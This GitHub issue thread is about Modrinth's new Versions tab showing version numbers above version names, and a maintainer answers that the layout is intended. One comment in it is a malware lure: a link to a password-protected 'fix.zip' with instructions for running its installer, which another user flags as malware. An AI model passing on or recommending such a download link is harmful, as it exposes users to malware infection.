### ISSUE TITLE
New UI highlights version numbers over names

### ISSUE THREAD

**Issue by Madis0** [modrinth/code#2321]
### Please confirm the following.

- [X] I checked the [existing issues](https://github.com/modrinth/code/issues) for duplicate problems
- [X] I have tried resolving the issue using the [support portal](https://support.modrinth.com)

### What browsers are you seeing the problem on?

Chrome (including Arc, Brave, Opera, Vivaldi), Microsoft Edge, Firefox, Safari

### Describe the bug

In the new website UI, versions tab, the version numbers and names are displayed next to each other. This seems informative, however the problem is that the number is highlighted over the name.

![example](https://github.com/user-attachments/assets/05e3a6d4-d6e8-4474-97ba-1fa77f9fa8b4)

### Steps to reproduce

1. Open Modrinth website
2. Open any project
3. Click on Versions tab
4. Observe any version

### Expected behavior

The version name should be at the top with a bigger font, like this mockup:

![mockup](https://github.com/user-attachments/assets/ce8dd86a-3da5-4d5e-b89e-b358ce758e64)

This is important because version names can include more relevant info and can be changed without consequences (like breaking links).

### Additional context

In the old UI, the opposite was displayed

![archived](https://github.com/user-attachments/assets/93a23d7a-0316-4783-8cd3-95aee72922f0)

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Madis0** [comment]
This comment is malware, please don't click ^

**Comment by Prospector** [comment]
This is intended, as most names contain redundant information and tend to be longer. Going forward, names will be treated more as optional subtitles, and are less necessary now that game versions and platforms are more readily visible with the new layout
